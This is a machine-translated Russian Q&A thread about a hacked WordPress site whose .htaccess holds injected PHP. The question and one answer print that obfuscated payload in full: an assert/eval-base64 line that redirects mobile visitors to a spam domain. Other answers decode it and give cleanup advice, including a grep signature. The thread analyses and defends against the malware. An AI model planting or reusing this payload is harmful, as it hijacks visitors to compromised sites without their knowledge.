1. дома
  2. Вопрос и ответ
  3. WordPress Сайт взломан

WordPress Сайт взломан

2013-04-01 6 views
-4

Я с веб-сайта (WordPress) и размещается на общем сервере хостинг, веб-сайт открывает штраф на рабочем столе и ноутбук, но когда мы открываем его на мобильный порносайтов открывает и даже код файла .htaccess.WordPress Сайт взломан

Код

<?php 
$_ = strrev("tress\x61"); @$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073"); 
?>

Пожалуйста, помогите,

Спасибо заранее.

источник

2013-04-01 user2230882

ответ

0
  1. Обновите свой Wordpress до последней версии.
  2. Обновите свои плагины + темы.
  3. Быстро «найти и заменить» на всех файлах для аналогичных кодов.
  4. изменить свои пароли wordpress/ftp/mysql/cp/webhost.
  5. установить антивирус на ваш Wordpress (их можно найти на своем сайте).
  6. попросить вашей поддержки клиентов хоста, если они получают атаки от хакеров и т.д.

источник

2013-04-01 05:32:34 SolidSnake

0

Извините за проблемы, я попытался расшифровать ваш образец кода.

Это:

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script>window.location="http://mobile-mobi.info/?2"</script>'; flush(); exit; }

Это будет перенаправлять посетителей с помощью мобильных устройств на определенный сайт.

Я предлагаю вам использовать сканер вредоносных программ, чтобы проверить ваш сайт, я использую ClamAV на сервере и стой на моем локальном сервере сканировать этот код, но не видит вирус обнаружен (Это может быть, их база данных не обновляется этот вредоносная информация).

Я предлагаю вам по-прежнему сканировать ваш сайт с помощью одного из сканеров для сканирования вашего сайта, чтобы обнаружить другой вирус. Дополнительно вы можете использовать команду Grep для поиска любых файлов имеет этот код и удалить его руководство

Команда Grep является:

grep -R 'strrev("tress\x61");' /var/www/html

Заменить /var/www/html корневой путь вашего сайта.

P/S: Извините, если мой английский не очень хорошо.

источник

2013-04-01 05:44:21

0

Вы должны прочитать руководство Hardening Wordpress - если ваш .htaccess был написан кем-то через Интернет, у вас достаточно большое отверстие безопасности (если не несколько).

You определенно хотите удалить этот код из .htaccess, я сделал немного тестирование и это на самом деле, что перенаправление на порносайт. Первая строка присваивает значение «assert» переменной $_, а затем использует ее для запуска кода, кодированного Base64. В двух словах он делает некоторые соответствия на ваших HTTP_ACCEPT переменных и гарантирует, что вы не пришли из поисковой системы, проверив HTTP_USER_AGENT и HTTP_REFERER. URL-адрес, который он перенаправляет, просто отправляет вас в Google, если вы не добавляете ?2 в качестве переменной querystring.

источник

2013-04-01 05:47:28 doublesharp

0

Я попытался расшифровать выше строки кода $_ = strrev("tress\x61"); этой линии будет возвращать функцию Assert и

@$_("e\166a\154\050b\141\163\145\066\064\137\144\145c\157\144\145\050'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgeyBlY2hvICc8c2NyaXB0PndpbmRvdy5sb2NhdGlvbj0iaHR0cDovL21vYmlsZS1tb2JpLmluZm8vPzIiPC9zY3JpcHQ+JzsgZmx1c2goKTsgZXhpdDsgfQ=='\051\051\073");

является вызовом функции Assert со следующим paramters.

eval(base64_decode('malicious code encoded as base64'))

так в полном виде она выглядит следующим образом

assert(eval (base64_decode('malicious code encoded as base64')));

Часть вредоносного кода проверяет, если запрос пришел с любого мобильного устройства, планшета или Ipad и т.д.

if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) {

Заключение Этот вредоносный код проверяет, поступает ли запрос с мобильного устройства (мобильный, iPad или любой планшет или определенные брови er), то перенаправить этот запрос.

Вы обнаружили проблемный код, который был удален из ваших каталогов, сервер, который вы используете для хостинга, убедитесь, что он безопасен и у вас есть антивирус, сменив ваши пароли, также проверьте, правильно ли встраивается этот код в ваш код когда вы загружаете, чтобы разорвать. Возможно, это не сервер, а ваша система.

источник

2013-04-01 05:48:47

0

Большинства WordPress взломов происходят из:

  • timthumb изменения размера изображений плагина в комплекте с некоторыми темами
  • Uploadify плагин обеспечивая некоторую функцию загрузки
  • простого пароль администратора (например, администратор/р @ ssw0rd)
  • не позволяя другим пользователям на общей машине либо читать файл wp-config.php, либо вносить изменения в ваши файлы (например, записываемый каталог).
  • уже существующий доступ хакера (например бэкдор сценарий где-то, что вы добросовестно загрузки)

Если вы не можете сделать свой сор-config.php нечитаемыми другим пользователям на компьютере, ваша проблема будет никогда не решайтесь, пока вы не переместите сайт.

источник

2013-04-04 10:57:31 derdeolifant

Смежные вопросы

 Смежные вопросы